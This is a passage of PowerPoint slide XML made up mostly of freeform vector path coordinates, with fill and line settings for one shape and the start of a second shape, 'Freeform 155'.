                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="553"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="550"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="544"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="539"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="540"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="543"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="550"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="550"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="555"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="544"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="531"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="527"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="526"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="524"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="524"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="522"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="521"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="518"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="517"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="506"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="503"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="502"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="492"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="479"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="476"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="468"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="460"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="449"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="443"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="442"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="444"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="418"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="407"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="381"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="355"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="340"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="335"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="327"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="321"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="344"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="374"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="390"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="393"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="421"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="442"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="461"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="474"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="476"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="496"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="502"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="505"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="506"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="508"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="512"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="512"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="513"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="518"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="522"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="524"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="532"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="544"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="554"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="564"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="571"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="575"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="583"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="590"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="592"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="605"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="608"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="619"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="622"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="627"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="642"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="654"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="655"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="652"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="650"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="653"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="679"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="686"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="686"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="686"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="687"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="690"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="694"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="694"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="107" y="760"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="100" y="761"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="760"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="757"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="757"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="758"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="761"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="762"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="757"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="753"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="750"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="748"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="748"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="752"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="752"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="744"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="742"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="741"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="739"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="740"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="736"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="731"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="724"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="720"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="719"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="722"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="719"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="712"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="706"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="701"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="702"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="716"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="760"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="39" y="710"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="35" y="708"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="699"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="695"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="691"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="692"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="689"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="691"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="700"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="704"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="710"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="27" y="483"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="25" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="480"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="458"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="461"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="483"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36423" name="Freeform 155"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1541" y="3227"/>
                <a:ext cx="135" cy="733"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 96 w 135"/>
                  <a:gd name="T1" fmla="*/ 693 h 733"/>
                  <a:gd name="T2" fmla="*/ 74 w 135"/>
                  <a:gd name="T3" fmla="*/ 712 h 733"/>
                  <a:gd name="T4" fmla="*/ 65 w 135"/>
                  <a:gd name="T5" fmla="*/ 733 h 733"/>
                  <a:gd name="T6" fmla="*/ 67 w 135"/>
                  <a:gd name="T7" fmla="*/ 706 h 733"/>
                  <a:gd name="T8" fmla="*/ 43 w 135"/>
                  <a:gd name="T9" fmla="*/ 707 h 733"/>
                  <a:gd name="T10" fmla="*/ 52 w 135"/>
                  <a:gd name="T11" fmla="*/ 698 h 733"/>
                  <a:gd name="T12" fmla="*/ 43 w 135"/>
                  <a:gd name="T13" fmla="*/ 682 h 733"/>
                  <a:gd name="T14" fmla="*/ 30 w 135"/>
                  <a:gd name="T15" fmla="*/ 678 h 733"/>
                  <a:gd name="T16" fmla="*/ 28 w 135"/>
                  <a:gd name="T17" fmla="*/ 663 h 733"/>
                  <a:gd name="T18" fmla="*/ 28 w 135"/>
                  <a:gd name="T19" fmla="*/ 651 h 733"/>
                  <a:gd name="T20" fmla="*/ 21 w 135"/>
                  <a:gd name="T21" fmla="*/ 637 h 733"/>
                  <a:gd name="T22" fmla="*/ 19 w 135"/>
                  <a:gd name="T23" fmla="*/ 619 h 733"/>
                  <a:gd name="T24" fmla="*/ 28 w 135"/>
                  <a:gd name="T25" fmla="*/ 588 h 733"/>
                  <a:gd name="T26" fmla="*/ 19 w 135"/>
                  <a:gd name="T27" fmla="*/ 579 h 733"/>
                  <a:gd name="T28" fmla="*/ 19 w 135"/>
                  <a:gd name="T29" fmla="*/ 568 h 733"/>
                  <a:gd name="T30" fmla="*/ 10 w 135"/>
                  <a:gd name="T31" fmla="*/ 557 h 733"/>
                  <a:gd name="T32" fmla="*/ 8 w 135"/>
                  <a:gd name="T33" fmla="*/ 545 h 733"/>
                  <a:gd name="T34" fmla="*/ 23 w 135"/>
                  <a:gd name="T35" fmla="*/ 540 h 733"/>
                  <a:gd name="T36" fmla="*/ 21 w 135"/>
